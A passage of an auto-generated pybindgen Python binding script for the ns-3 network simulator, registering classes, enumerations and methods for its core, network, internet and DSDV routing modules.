module.add_enum('EcnType', ['ECN_NotECT', 'ECN_ECT1', 'ECN_ECT0', 'ECN_CE'], outer_class=root_module['ns3::Ipv4Header'], import_from_module='ns.internet')
## ipv6-header.h (module 'internet'): ns3::Ipv6Header [class]
module.add_class('Ipv6Header', import_from_module='ns.internet', parent=root_module['ns3::Header'])
## ipv6-header.h (module 'internet'): ns3::Ipv6Header::NextHeader_e [enumeration]
module.add_enum('NextHeader_e', ['IPV6_EXT_HOP_BY_HOP', 'IPV6_IPV4', 'IPV6_TCP', 'IPV6_UDP', 'IPV6_IPV6', 'IPV6_EXT_ROUTING', 'IPV6_EXT_FRAGMENTATION', 'IPV6_EXT_CONFIDENTIALITY', 'IPV6_EXT_AUTHENTIFICATION', 'IPV6_ICMPV6', 'IPV6_EXT_END', 'IPV6_EXT_DESTINATION', 'IPV6_SCTP', 'IPV6_EXT_MOBILITY', 'IPV6_UDP_LITE'], outer_class=root_module['ns3::Ipv6Header'], import_from_module='ns.internet')
## object.h (module 'core'): ns3::Object [class]
module.add_class('Object', import_from_module='ns.core', parent=root_module['ns3::SimpleRefCount< ns3::Object, ns3::ObjectBase, ns3::ObjectDeleter >'])
## object.h (module 'core'): ns3::Object::AggregateIterator [class]
module.add_class('AggregateIterator', import_from_module='ns.core', outer_class=root_module['ns3::Object'])
## random-variable-stream.h (module 'core'): ns3::RandomVariableStream [class]
module.add_class('RandomVariableStream', import_from_module='ns.core', parent=root_module['ns3::Object'])
## random-variable-stream.h (module 'core'): ns3::SequentialRandomVariable [class]
module.add_class('SequentialRandomVariable', import_from_module='ns.core', parent=root_module['ns3::RandomVariableStream'])
## simple-ref-count.h (module 'core'): ns3::SimpleRefCount<ns3::AttributeAccessor, ns3::empty, ns3::DefaultDeleter<ns3::AttributeAccessor> > [class]
module.add_class('SimpleRefCount', automatic_type_narrowing=True, import_from_module='ns.core', template_parameters=['ns3::AttributeAccessor', 'ns3::empty', 'ns3::DefaultDeleter<ns3::AttributeAccessor>'], parent=root_module['ns3::empty'], memory_policy=cppclass.ReferenceCountingMethodsPolicy(incref_method='Ref', decref_method='Unref', peekref_method='GetReferenceCount'))
## simple-ref-count.h (module 'core'): ns3::SimpleRefCount<ns3::AttributeChecker, ns3::empty, ns3::DefaultDeleter<ns3::AttributeChecker> > [class]
module.add_class('SimpleRefCount', automatic_type_narrowing=True, import_from_module='ns.core', template_parameters=['ns3::AttributeChecker', 'ns3::empty', 'ns3::DefaultDeleter<ns3::AttributeChecker>'], parent=root_module['ns3::empty'], memory_policy=cppclass.ReferenceCountingMethodsPolicy(incref_method='Ref', decref_method='Unref', peekref_method='GetReferenceCount'))
## simple-ref-count.h (module 'core'): ns3::SimpleRefCount<ns3::AttributeValue, ns3::empty, ns3::DefaultDeleter<ns3::AttributeValue> > [class]
module.add_class('SimpleRefCount', automatic_type_narrowing=True, import_from_module='ns.core', template_parameters=['ns3::AttributeValue', 'ns3::empty', 'ns3::DefaultDeleter<ns3::AttributeValue>'], parent=root_module['ns3::empty'], memory_policy=cppclass.ReferenceCountingMethodsPolicy(incref_method='Ref', decref_method='Unref', peekref_method='GetReferenceCount'))
## simple-ref-count.h (module 'core'): ns3::SimpleRefCount<ns3::CallbackImplBase, ns3::empty, ns3::DefaultDeleter<ns3::CallbackImplBase> > [class]
module.add_class('SimpleRefCount', automatic_type_narrowing=True, import_from_module='ns.core', template_parameters=['ns3::CallbackImplBase', 'ns3::empty', 'ns3::DefaultDeleter<ns3::CallbackImplBase>'], parent=root_module['ns3::empty'], memory_policy=cppclass.ReferenceCountingMethodsPolicy(incref_method='Ref', decref_method='Unref', peekref_method='GetReferenceCount'))
## simple-ref-count.h (module 'core'): ns3::SimpleRefCount<ns3::EventImpl, ns3::empty, ns3::DefaultDeleter<ns3::EventImpl> > [class]
module.add_class('SimpleRefCount', automatic_type_narrowing=True, import_from_module='ns.core', template_parameters=['ns3::EventImpl', 'ns3::empty', 'ns3::DefaultDeleter<ns3::EventImpl>'], parent=root_module['ns3::empty'], memory_policy=cppclass.ReferenceCountingMethodsPolicy(incref_method='Ref', decref_method='Unref', peekref_method='GetReferenceCount'))
## simple-ref-count.h (module 'core'): ns3::SimpleRefCount<ns3::Hash::Implementation, ns3::empty, ns3::DefaultDeleter<ns3::Hash::Implementation> > [class]
module.add_class('SimpleRefCount', automatic_type_narrowing=True, import_from_module='ns.core', template_parameters=['ns3::Hash::Implementation', 'ns3::empty', 'ns3::DefaultDeleter<ns3::Hash::Implementation>'], parent=root_module['ns3::empty'], memory_policy=cppclass.ReferenceCountingMethodsPolicy(incref_method='Ref', decref_method='Unref', peekref_method='GetReferenceCount'))
## simple-ref-count.h (module 'core'): ns3::SimpleRefCount<ns3::Ipv4MulticastRoute, ns3::empty, ns3::DefaultDeleter<ns3::Ipv4MulticastRoute> > [class]
module.add_class('SimpleRefCount', automatic_type_narrowing=True, import_from_module='ns.core', template_parameters=['ns3::Ipv4MulticastRoute', 'ns3::empty', 'ns3::DefaultDeleter<ns3::Ipv4MulticastRoute>'], parent=root_module['ns3::empty'], memory_policy=cppclass.ReferenceCountingMethodsPolicy(incref_method='Ref', decref_method='Unref', peekref_method='GetReferenceCount'))
## simple-ref-count.h (module 'core'): ns3::SimpleRefCount<ns3::Ipv4Route, ns3::empty, ns3::DefaultDeleter<ns3::Ipv4Route> > [class]
module.add_class('SimpleRefCount', automatic_type_narrowing=True, import_from_module='ns.core', template_parameters=['ns3::Ipv4Route', 'ns3::empty', 'ns3::DefaultDeleter<ns3::Ipv4Route>'], parent=root_module['ns3::empty'], memory_policy=cppclass.ReferenceCountingMethodsPolicy(incref_method='Ref', decref_method='Unref', peekref_method='GetReferenceCount'))
## simple-ref-count.h (module 'core'): ns3::SimpleRefCount<ns3::NixVector, ns3::empty, ns3::DefaultDeleter<ns3::NixVector> > [class]
module.add_class('SimpleRefCount', automatic_type_narrowing=True, import_from_module='ns.core', template_parameters=['ns3::NixVector', 'ns3::empty', 'ns3::DefaultDeleter<ns3::NixVector>'], parent=root_module['ns3::empty'], memory_policy=cppclass.ReferenceCountingMethodsPolicy(incref_method='Ref', decref_method='Unref', peekref_method='GetReferenceCount'))
## simple-ref-count.h (module 'core'): ns3::SimpleRefCount<ns3::OutputStreamWrapper, ns3::empty, ns3::DefaultDeleter<ns3::OutputStreamWrapper> > [class]
module.add_class('SimpleRefCount', automatic_type_narrowing=True, import_from_module='ns.core', template_parameters=['ns3::OutputStreamWrapper', 'ns3::empty', 'ns3::DefaultDeleter<ns3::OutputStreamWrapper>'], parent=root_module['ns3::empty'], memory_policy=cppclass.ReferenceCountingMethodsPolicy(incref_method='Ref', decref_method='Unref', peekref_method='GetReferenceCount'))
## simple-ref-count.h (module 'core'): ns3::SimpleRefCount<ns3::Packet, ns3::empty, ns3::DefaultDeleter<ns3::Packet> > [class]
module.add_class('SimpleRefCount', automatic_type_narrowing=True, import_from_module='ns.core', template_parameters=['ns3::Packet', 'ns3::empty', 'ns3::DefaultDeleter<ns3::Packet>'], parent=root_module['ns3::empty'], memory_policy=cppclass.ReferenceCountingMethodsPolicy(incref_method='Ref', decref_method='Unref', peekref_method='GetReferenceCount'))
## simple-ref-count.h (module 'core'): ns3::SimpleRefCount<ns3::TraceSourceAccessor, ns3::empty, ns3::DefaultDeleter<ns3::TraceSourceAccessor> > [class]
module.add_class('SimpleRefCount', automatic_type_narrowing=True, import_from_module='ns.core', template_parameters=['ns3::TraceSourceAccessor', 'ns3::empty', 'ns3::DefaultDeleter<ns3::TraceSourceAccessor>'], parent=root_module['ns3::empty'], memory_policy=cppclass.ReferenceCountingMethodsPolicy(incref_method='Ref', decref_method='Unref', peekref_method='GetReferenceCount'))
## socket.h (module 'network'): ns3::Socket [class]
module.add_class('Socket', import_from_module='ns.network', parent=root_module['ns3::Object'])
## socket.h (module 'network'): ns3::Socket::SocketErrno [enumeration]
module.add_enum('SocketErrno', ['ERROR_NOTERROR', 'ERROR_ISCONN', 'ERROR_NOTCONN', 'ERROR_MSGSIZE', 'ERROR_AGAIN', 'ERROR_SHUTDOWN', 'ERROR_OPNOTSUPP', 'ERROR_AFNOSUPPORT', 'ERROR_INVAL', 'ERROR_BADF', 'ERROR_NOROUTETOHOST', 'ERROR_NODEV', 'ERROR_ADDRNOTAVAIL', 'ERROR_ADDRINUSE', 'SOCKET_ERRNO_LAST'], outer_class=root_module['ns3::Socket'], import_from_module='ns.network')
## socket.h (module 'network'): ns3::Socket::SocketType [enumeration]
module.add_enum('SocketType', ['NS3_SOCK_STREAM', 'NS3_SOCK_SEQPACKET', 'NS3_SOCK_DGRAM', 'NS3_SOCK_RAW'], outer_class=root_module['ns3::Socket'], import_from_module='ns.network')
## socket.h (module 'network'): ns3::SocketAddressTag [class]
module.add_class('SocketAddressTag', import_from_module='ns.network', parent=root_module['ns3::Tag'])
## socket.h (module 'network'): ns3::SocketIpTosTag [class]
module.add_class('SocketIpTosTag', import_from_module='ns.network', parent=root_module['ns3::Tag'])
## socket.h (module 'network'): ns3::SocketIpTtlTag [class]
module.add_class('SocketIpTtlTag', import_from_module='ns.network', parent=root_module['ns3::Tag'])
## socket.h (module 'network'): ns3::SocketIpv6HopLimitTag [class]
module.add_class('SocketIpv6HopLimitTag', import_from_module='ns.network', parent=root_module['ns3::Tag'])
## socket.h (module 'network'): ns3::SocketIpv6TclassTag [class]
module.add_class('SocketIpv6TclassTag', import_from_module='ns.network', parent=root_module['ns3::Tag'])
## socket.h (module 'network'): ns3::SocketSetDontFragmentTag [class]
module.add_class('SocketSetDontFragmentTag', import_from_module='ns.network', parent=root_module['ns3::Tag'])
## nstime.h (module 'core'): ns3::Time [class]
module.add_class('Time', import_from_module='ns.core')
## nstime.h (module 'core'): ns3::Time::Unit [enumeration]
module.add_enum('Unit', ['S', 'MS', 'US', 'NS', 'PS', 'FS', 'LAST'], outer_class=root_module['ns3::Time'], import_from_module='ns.core')
## nstime.h (module 'core'): ns3::Time [class]
root_module['ns3::Time'].implicitly_converts_to(root_module['ns3::int64x64_t'])
## trace-source-accessor.h (module 'core'): ns3::TraceSourceAccessor [class]
module.add_class('TraceSourceAccessor', import_from_module='ns.core', parent=root_module['ns3::SimpleRefCount< ns3::TraceSourceAccessor, ns3::empty, ns3::DefaultDeleter<ns3::TraceSourceAccessor> >'])
## trailer.h (module 'network'): ns3::Trailer [class]
module.add_class('Trailer', import_from_module='ns.network', parent=root_module['ns3::Chunk'])
## random-variable-stream.h (module 'core'): ns3::TriangularRandomVariable [class]
module.add_class('TriangularRandomVariable', import_from_module='ns.core', parent=root_module['ns3::RandomVariableStream'])
## random-variable-stream.h (module 'core'): ns3::UniformRandomVariable [class]
module.add_class('UniformRandomVariable', import_from_module='ns.core', parent=root_module['ns3::RandomVariableStream'])
## random-variable-stream.h (module 'core'): ns3::WeibullRandomVariable [class]
module.add_class('WeibullRandomVariable', import_from_module='ns.core', parent=root_module['ns3::RandomVariableStream'])
## random-variable-stream.h (module 'core'): ns3::ZetaRandomVariable [class]
module.add_class('ZetaRandomVariable', import_from_module='ns.core', parent=root_module['ns3::RandomVariableStream'])
## random-variable-stream.h (module 'core'): ns3::ZipfRandomVariable [class]
module.add_class('ZipfRandomVariable', import_from_module='ns.core', parent=root_module['ns3::RandomVariableStream'])
## attribute.h (module 'core'): ns3::AttributeAccessor [class]
module.add_class('AttributeAccessor', import_from_module='ns.core', parent=root_module['ns3::SimpleRefCount< ns3::AttributeAccessor, ns3::empty, ns3::DefaultDeleter<ns3::AttributeAccessor> >'])
## attribute.h (module 'core'): ns3::AttributeChecker [class]
module.add_class('AttributeChecker', allow_subclassing=False, automatic_type_narrowing=True, import_from_module='ns.core', parent=root_module['ns3::SimpleRefCount< ns3::AttributeChecker, ns3::empty, ns3::DefaultDeleter<ns3::AttributeChecker> >'])
## attribute.h (module 'core'): ns3::AttributeValue [class]
module.add_class('AttributeValue', allow_subclassing=False, automatic_type_narrowing=True, import_from_module='ns.core', parent=root_module['ns3::SimpleRefCount< ns3::AttributeValue, ns3::empty, ns3::DefaultDeleter<ns3::AttributeValue> >'])
## callback.h (module 'core'): ns3::CallbackChecker [class]
module.add_class('CallbackChecker', import_from_module='ns.core', parent=root_module['ns3::AttributeChecker'])
## callback.h (module 'core'): ns3::CallbackImplBase [class]
module.add_class('CallbackImplBase', import_from_module='ns.core', parent=root_module['ns3::SimpleRefCount< ns3::CallbackImplBase, ns3::empty, ns3::DefaultDeleter<ns3::CallbackImplBase> >'])
## callback.h (module 'core'): ns3::CallbackValue [class]
module.add_class('CallbackValue', import_from_module='ns.core', parent=root_module['ns3::AttributeValue'])
## random-variable-stream.h (module 'core'): ns3::ConstantRandomVariable [class]
module.add_class('ConstantRandomVariable', import_from_module='ns.core', parent=root_module['ns3::RandomVariableStream'])
## random-variable-stream.h (module 'core'): ns3::DeterministicRandomVariable [class]
module.add_class('DeterministicRandomVariable', import_from_module='ns.core', parent=root_module['ns3::RandomVariableStream'])
## random-variable-stream.h (module 'core'): ns3::EmpiricalRandomVariable [class]
module.add_class('EmpiricalRandomVariable', import_from_module='ns.core', parent=root_module['ns3::RandomVariableStream'])
## attribute.h (module 'core'): ns3::EmptyAttributeValue [class]
module.add_class('EmptyAttributeValue', import_from_module='ns.core', parent=root_module['ns3::AttributeValue'])
## random-variable-stream.h (module 'core'): ns3::ErlangRandomVariable [class]
module.add_class('ErlangRandomVariable', import_from_module='ns.core', parent=root_module['ns3::RandomVariableStream'])
## event-impl.h (module 'core'): ns3::EventImpl [class]
module.add_class('EventImpl', import_from_module='ns.core', parent=root_module['ns3::SimpleRefCount< ns3::EventImpl, ns3::empty, ns3::DefaultDeleter<ns3::EventImpl> >'])
## random-variable-stream.h (module 'core'): ns3::ExponentialRandomVariable [class]
module.add_class('ExponentialRandomVariable', import_from_module='ns.core', parent=root_module['ns3::RandomVariableStream'])
## random-variable-stream.h (module 'core'): ns3::GammaRandomVariable [class]
module.add_class('GammaRandomVariable', import_from_module='ns.core', parent=root_module['ns3::RandomVariableStream'])
## ip-l4-protocol.h (module 'internet'): ns3::IpL4Protocol [class]
module.add_class('IpL4Protocol', import_from_module='ns.internet', parent=root_module['ns3::Object'])
## ip-l4-protocol.h (module 'internet'): ns3::IpL4Protocol::RxStatus [enumeration]
module.add_enum('RxStatus', ['RX_OK', 'RX_CSUM_FAILED', 'RX_ENDPOINT_CLOSED', 'RX_ENDPOINT_UNREACH'], outer_class=root_module['ns3::IpL4Protocol'], import_from_module='ns.internet')
## ipv4.h (module 'internet'): ns3::Ipv4 [class]
module.add_class('Ipv4', import_from_module='ns.internet', parent=root_module['ns3::Object'])
## ipv4-address.h (module 'network'): ns3::Ipv4AddressChecker [class]
module.add_class('Ipv4AddressChecker', import_from_module='ns.network', parent=root_module['ns3::AttributeChecker'])
## ipv4-address.h (module 'network'): ns3::Ipv4AddressValue [class]
module.add_class('Ipv4AddressValue', import_from_module='ns.network', parent=root_module['ns3::AttributeValue'])
## ipv4-interface.h (module 'internet'): ns3::Ipv4Interface [class]
module.add_class('Ipv4Interface', import_from_module='ns.internet', parent=root_module['ns3::Object'])
## ipv4-l3-protocol.h (module 'internet'): ns3::Ipv4L3Protocol [class]
module.add_class('Ipv4L3Protocol', import_from_module='ns.internet', parent=root_module['ns3::Ipv4'])
## ipv4-l3-protocol.h (module 'internet'): ns3::Ipv4L3Protocol::DropReason [enumeration]
module.add_enum('DropReason', ['DROP_TTL_EXPIRED', 'DROP_NO_ROUTE', 'DROP_BAD_CHECKSUM', 'DROP_INTERFACE_DOWN', 'DROP_ROUTE_ERROR', 'DROP_FRAGMENT_TIMEOUT'], outer_class=root_module['ns3::Ipv4L3Protocol'], import_from_module='ns.internet')
## ipv4-address.h (module 'network'): ns3::Ipv4MaskChecker [class]
module.add_class('Ipv4MaskChecker', import_from_module='ns.network', parent=root_module['ns3::AttributeChecker'])
## ipv4-address.h (module 'network'): ns3::Ipv4MaskValue [class]
module.add_class('Ipv4MaskValue', import_from_module='ns.network', parent=root_module['ns3::AttributeValue'])
## ipv4-route.h (module 'internet'): ns3::Ipv4MulticastRoute [class]
module.add_class('Ipv4MulticastRoute', import_from_module='ns.internet', parent=root_module['ns3::SimpleRefCount< ns3::Ipv4MulticastRoute, ns3::empty, ns3::DefaultDeleter<ns3::Ipv4MulticastRoute> >'])
## ipv4-route.h (module 'internet'): ns3::Ipv4Route [class]
module.add_class('Ipv4Route', import_from_module='ns.internet', parent=root_module['ns3::SimpleRefCount< ns3::Ipv4Route, ns3::empty, ns3::DefaultDeleter<ns3::Ipv4Route> >'])
## ipv4-routing-protocol.h (module 'internet'): ns3::Ipv4RoutingProtocol [class]
module.add_class('Ipv4RoutingProtocol', import_from_module='ns.internet', parent=root_module['ns3::Object'])
## ipv6-address.h (module 'network'): ns3::Ipv6AddressChecker [class]
module.add_class('Ipv6AddressChecker', import_from_module='ns.network', parent=root_module['ns3::AttributeChecker'])
## ipv6-address.h (module 'network'): ns3::Ipv6AddressValue [class]
module.add_class('Ipv6AddressValue', import_from_module='ns.network', parent=root_module['ns3::AttributeValue'])
## ipv6-interface.h (module 'internet'): ns3::Ipv6Interface [class]
module.add_class('Ipv6Interface', import_from_module='ns.internet', parent=root_module['ns3::Object'])
## ipv6-address.h (module 'network'): ns3::Ipv6PrefixChecker [class]
module.add_class('Ipv6PrefixChecker', import_from_module='ns.network', parent=root_module['ns3::AttributeChecker'])
## ipv6-address.h (module 'network'): ns3::Ipv6PrefixValue [class]
module.add_class('Ipv6PrefixValue', import_from_module='ns.network', parent=root_module['ns3::AttributeValue'])
## random-variable-stream.h (module 'core'): ns3::LogNormalRandomVariable [class]
module.add_class('LogNormalRandomVariable', import_from_module='ns.core', parent=root_module['ns3::RandomVariableStream'])
## net-device.h (module 'network'): ns3::NetDevice [class]
module.add_class('NetDevice', import_from_module='ns.network', parent=root_module['ns3::Object'])
## net-device.h (module 'network'): ns3::NetDevice::PacketType [enumeration]
module.add_enum('PacketType', ['PACKET_HOST', 'NS3_PACKET_HOST', 'PACKET_BROADCAST', 'NS3_PACKET_BROADCAST', 'PACKET_MULTICAST', 'NS3_PACKET_MULTICAST', 'PACKET_OTHERHOST', 'NS3_PACKET_OTHERHOST'], outer_class=root_module['ns3::NetDevice'], import_from_module='ns.network')
## nix-vector.h (module 'network'): ns3::NixVector [class]
module.add_class('NixVector', import_from_module='ns.network', parent=root_module['ns3::SimpleRefCount< ns3::NixVector, ns3::empty, ns3::DefaultDeleter<ns3::NixVector> >'])
## node.h (module 'network'): ns3::Node [class]
module.add_class('Node', import_from_module='ns.network', parent=root_module['ns3::Object'])
## random-variable-stream.h (module 'core'): ns3::NormalRandomVariable [class]
module.add_class('NormalRandomVariable', import_from_module='ns.core', parent=root_module['ns3::RandomVariableStream'])
## object-factory.h (module 'core'): ns3::ObjectFactoryChecker [class]
module.add_class('ObjectFactoryChecker', import_from_module='ns.core', parent=root_module['ns3::AttributeChecker'])
## object-factory.h (module 'core'): ns3::ObjectFactoryValue [class]
module.add_class('ObjectFactoryValue', import_from_module='ns.core', parent=root_module['ns3::AttributeValue'])
## output-stream-wrapper.h (module 'network'): ns3::OutputStreamWrapper [class]
module.add_class('OutputStreamWrapper', import_from_module='ns.network', parent=root_module['ns3::SimpleRefCount< ns3::OutputStreamWrapper, ns3::empty, ns3::DefaultDeleter<ns3::OutputStreamWrapper> >'])
## packet.h (module 'network'): ns3::Packet [class]
module.add_class('Packet', import_from_module='ns.network', parent=root_module['ns3::SimpleRefCount< ns3::Packet, ns3::empty, ns3::DefaultDeleter<ns3::Packet> >'])
## random-variable-stream.h (module 'core'): ns3::ParetoRandomVariable [class]
module.add_class('ParetoRandomVariable', import_from_module='ns.core', parent=root_module['ns3::RandomVariableStream'])
## nstime.h (module 'core'): ns3::TimeValue [class]
module.add_class('TimeValue', import_from_module='ns.core', parent=root_module['ns3::AttributeValue'])
## type-id.h (module 'core'): ns3::TypeIdChecker [class]
module.add_class('TypeIdChecker', import_from_module='ns.core', parent=root_module['ns3::AttributeChecker'])
## type-id.h (module 'core'): ns3::TypeIdValue [class]
module.add_class('TypeIdValue', import_from_module='ns.core', parent=root_module['ns3::AttributeValue'])
## address.h (module 'network'): ns3::AddressChecker [class]
module.add_class('AddressChecker', import_from_module='ns.network', parent=root_module['ns3::AttributeChecker'])
## address.h (module 'network'): ns3::AddressValue [class]
module.add_class('AddressValue', import_from_module='ns.network', parent=root_module['ns3::AttributeValue'])
## ipv4-list-routing.h (module 'internet'): ns3::Ipv4ListRouting [class]
module.add_class('Ipv4ListRouting', import_from_module='ns.internet', parent=root_module['ns3::Ipv4RoutingProtocol'])
module.add_container('std::map< unsigned int, unsigned int >', ('unsigned int', 'unsigned int'), container_type='map')
## Register a nested module for the namespace FatalImpl
nested_module = module.add_cpp_namespace('FatalImpl')
register_types_ns3_FatalImpl(nested_module)
## Register a nested module for the namespace Hash
nested_module = module.add_cpp_namespace('Hash')
register_types_ns3_Hash(nested_module)
## Register a nested module for the namespace dsdv
nested_module = module.add_cpp_namespace('dsdv')
register_types_ns3_dsdv(nested_module)
def register_types_ns3_FatalImpl(module):
root_module = module.get_root()
def register_types_ns3_Hash(module):
root_module = module.get_root()
## hash-function.h (module 'core'): ns3::Hash::Implementation [class]
module.add_class('Implementation', import_from_module='ns.core', parent=root_module['ns3::SimpleRefCount< ns3::Hash::Implementation, ns3::empty, ns3::DefaultDeleter<ns3::Hash::Implementation> >'])
typehandlers.add_type_alias('uint32_t ( * ) ( char const *, size_t ) *', 'ns3::Hash::Hash32Function_ptr')
typehandlers.add_type_alias('uint32_t ( * ) ( char const *, size_t ) **', 'ns3::Hash::Hash32Function_ptr*')
typehandlers.add_type_alias('uint32_t ( * ) ( char const *, size_t ) *&', 'ns3::Hash::Hash32Function_ptr&')
typehandlers.add_type_alias('uint64_t ( * ) ( char const *, size_t ) *', 'ns3::Hash::Hash64Function_ptr')
typehandlers.add_type_alias('uint64_t ( * ) ( char const *, size_t ) **', 'ns3::Hash::Hash64Function_ptr*')
typehandlers.add_type_alias('uint64_t ( * ) ( char const *, size_t ) *&', 'ns3::Hash::Hash64Function_ptr&')
## Register a nested module for the namespace Function
nested_module = module.add_cpp_namespace('Function')
register_types_ns3_Hash_Function(nested_module)
def register_types_ns3_Hash_Function(module):
root_module = module.get_root()
## hash-fnv.h (module 'core'): ns3::Hash::Function::Fnv1a [class]
module.add_class('Fnv1a', import_from_module='ns.core', parent=root_module['ns3::Hash::Implementation'])
## hash-function.h (module 'core'): ns3::Hash::Function::Hash32 [class]
module.add_class('Hash32', import_from_module='ns.core', parent=root_module['ns3::Hash::Implementation'])
## hash-function.h (module 'core'): ns3::Hash::Function::Hash64 [class]
module.add_class('Hash64', import_from_module='ns.core', parent=root_module['ns3::Hash::Implementation'])
## hash-murmur3.h (module 'core'): ns3::Hash::Function::Murmur3 [class]
module.add_class('Murmur3', import_from_module='ns.core', parent=root_module['ns3::Hash::Implementation'])
def register_types_ns3_dsdv(module):
root_module = module.get_root()
## dsdv-rtable.h (module 'dsdv'): ns3::dsdv::RouteFlags [enumeration]
module.add_enum('RouteFlags', ['VALID', 'INVALID'])
## dsdv-packet.h (module 'dsdv'): ns3::dsdv::DsdvHeader [class]
module.add_class('DsdvHeader', parent=root_module['ns3::Header'])
## dsdv-packet-queue.h (module 'dsdv'): ns3::dsdv::PacketQueue [class]
module.add_class('PacketQueue')
## dsdv-packet-queue.h (module 'dsdv'): ns3::dsdv::QueueEntry [class]
module.add_class('QueueEntry')
## dsdv-routing-protocol.h (module 'dsdv'): ns3::dsdv::RoutingProtocol [class]
module.add_class('RoutingProtocol', parent=root_module['ns3::Ipv4RoutingProtocol'])
## dsdv-rtable.h (module 'dsdv'): ns3::dsdv::RoutingTable [class]
module.add_class('RoutingTable')
## dsdv-rtable.h (module 'dsdv'): ns3::dsdv::RoutingTableEntry [class]
module.add_class('RoutingTableEntry')
module.add_container('std::map< ns3::Ipv4Address, ns3::dsdv::RoutingTableEntry >', ('ns3::Ipv4Address', 'ns3::dsdv::RoutingTableEntry'), container_type='map')
def register_methods(root_module):
register_Ns3Address_methods(root_module, root_module['ns3::Address'])
register_Ns3AttributeConstructionList_methods(root_module, root_module['ns3::AttributeConstructionList'])
register_Ns3AttributeConstructionListItem_methods(root_module, root_module['ns3::AttributeConstructionList::Item'])
register_Ns3Buffer_methods(root_module, root_module['ns3::Buffer'])
register_Ns3BufferIterator_methods(root_module, root_module['ns3::Buffer::Iterator'])
register_Ns3ByteTagIterator_methods(root_module, root_module['ns3::ByteTagIterator'])
register_Ns3ByteTagIteratorItem_methods(root_module, root_module['ns3::ByteTagIterator::Item'])
register_Ns3ByteTagList_methods(root_module, root_module['ns3::ByteTagList'])
register_Ns3ByteTagListIterator_methods(root_module, root_module['ns3::ByteTagList::Iterator'])
register_Ns3ByteTagListIteratorItem_methods(root_module, root_module['ns3::ByteTagList::Iterator::Item'])
register_Ns3CallbackBase_methods(root_module, root_module['ns3::CallbackBase'])
register_Ns3EventId_methods(root_module, root_module['ns3::EventId'])
register_Ns3Hasher_methods(root_module, root_module['ns3::Hasher'])
register_Ns3Inet6SocketAddress_methods(root_module, root_module['ns3::Inet6SocketAddress'])
register_Ns3InetSocketAddress_methods(root_module, root_module['ns3::InetSocketAddress'])
register_Ns3IntToType__0_methods(root_module, root_module['ns3::IntToType< 0 >'])
register_Ns3IntToType__1_methods(root_module, root_module['ns3::IntToType< 1 >'])
register_Ns3IntToType__2_methods(root_module, root_module['ns3::IntToType< 2 >'])
register_Ns3IntToType__3_methods(root_module, root_module['ns3::IntToType< 3 >'])
register_Ns3IntToType__4_methods(root_module, root_module['ns3::IntToType< 4 >'])
register_Ns3IntToType__5_methods(root_module, root_module['ns3::IntToType< 5 >'])
register_Ns3IntToType__6_methods(root_module, root_module['ns3::IntToType< 6 >'])
register_Ns3Ipv4Address_methods(root_module, root_module['ns3::Ipv4Address'])
register_Ns3Ipv4InterfaceAddress_methods(root_module, root_module['ns3::Ipv4InterfaceAddress'])
register_Ns3Ipv4Mask_methods(root_module, root_module['ns3::Ipv4Mask'])
register_Ns3Ipv4RoutingHelper_methods(root_module, root_module['ns3::Ipv4RoutingHelper'])
register_Ns3Ipv6Address_methods(root_module, root_module['ns3::Ipv6Address'])
register_Ns3Ipv6InterfaceAddress_methods(root_module, root_module['ns3::Ipv6InterfaceAddress'])
register_Ns3Ipv6Prefix_methods(root_module, root_module['ns3::Ipv6Prefix'])
register_Ns3NodeContainer_methods(root_module, root_module['ns3::NodeContainer'])
register_Ns3ObjectBase_methods(root_module, root_module['ns3::ObjectBase'])
register_Ns3ObjectDeleter_methods(root_module, root_module['ns3::ObjectDeleter'])
register_Ns3ObjectFactory_methods(root_module, root_module['ns3::ObjectFactory'])
register_Ns3PacketMetadata_methods(root_module, root_module['ns3::PacketMetadata'])
register_Ns3PacketMetadataItem_methods(root_module, root_module['ns3::PacketMetadata::Item'])
register_Ns3PacketMetadataItemIterator_methods(root_module, root_module['ns3::PacketMetadata::ItemIterator'])
register_Ns3PacketTagIterator_methods(root_module, root_module['ns3::PacketTagIterator'])
register_Ns3PacketTagIteratorItem_methods(root_module, root_module['ns3::PacketTagIterator::Item'])
register_Ns3PacketTagList_methods(root_module, root_module['ns3::PacketTagList'])
register_Ns3PacketTagListTagData_methods(root_module, root_module['ns3::PacketTagList::TagData'])
register_Ns3SimpleRefCount__Ns3Object_Ns3ObjectBase_Ns3ObjectDeleter_methods(root_module, root_module['ns3::SimpleRefCount< ns3::Object, ns3::ObjectBase, ns3::ObjectDeleter >'])
register_Ns3Simulator_methods(root_module, root_module['ns3::Simulator'])
register_Ns3Tag_methods(root_module, root_module['ns3::Tag'])
register_Ns3TagBuffer_methods(root_module, root_module['ns3::TagBuffer'])
register_Ns3Timer_methods(root_module, root_module['ns3::Timer'])
register_Ns3TimerImpl_methods(root_module, root_module['ns3::TimerImpl'])
register_Ns3TypeId_methods(root_module, root_module['ns3::TypeId'])
register_Ns3TypeIdAttributeInformation_methods(root_module, root_module['ns3::TypeId::AttributeInformation'])
register_Ns3TypeIdTraceSourceInformation_methods(root_module, root_module['ns3::TypeId::TraceSourceInformation'])
register_Ns3Empty_methods(root_module, root_module['ns3::empty'])
register_Ns3Int64x64_t_methods(root_module, root_module['ns3::int64x64_t'])
register_Ns3Chunk_methods(root_module, root_module['ns3::Chunk'])
register_Ns3DsdvHelper_methods(root_module, root_module['ns3::DsdvHelper'])
register_Ns3Header_methods(root_module, root_module['ns3::Header'])
register_Ns3Ipv4Header_methods(root_module, root_module['ns3::Ipv4Header'])
register_Ns3Ipv6Header_methods(root_module, root_module['ns3::Ipv6Header'])
register_Ns3Object_methods(root_module, root_module['ns3::Object'])
register_Ns3ObjectAggregateIterator_methods(root_module, root_module['ns3::Object::AggregateIterator'])
register_Ns3RandomVariableStream_methods(root_module, root_module['ns3::RandomVariableStream'])
register_Ns3SequentialRandomVariable_methods(root_module, root_module['ns3::SequentialRandomVariable'])
register_Ns3SimpleRefCount__Ns3AttributeAccessor_Ns3Empty_Ns3DefaultDeleter__lt__ns3AttributeAccessor__gt___methods(root_module, root_module['ns3::SimpleRefCount< ns3::AttributeAccessor, ns3::empty, ns3::DefaultDeleter<ns3::AttributeAccessor> >'])
register_Ns3SimpleRefCount__Ns3AttributeChecker_Ns3Empty_Ns3DefaultDeleter__lt__ns3AttributeChecker__gt___methods(root_module, root_module['ns3::SimpleRefCount< ns3::AttributeChecker, ns3::empty, ns3::DefaultDeleter<ns3::AttributeChecker> >'])
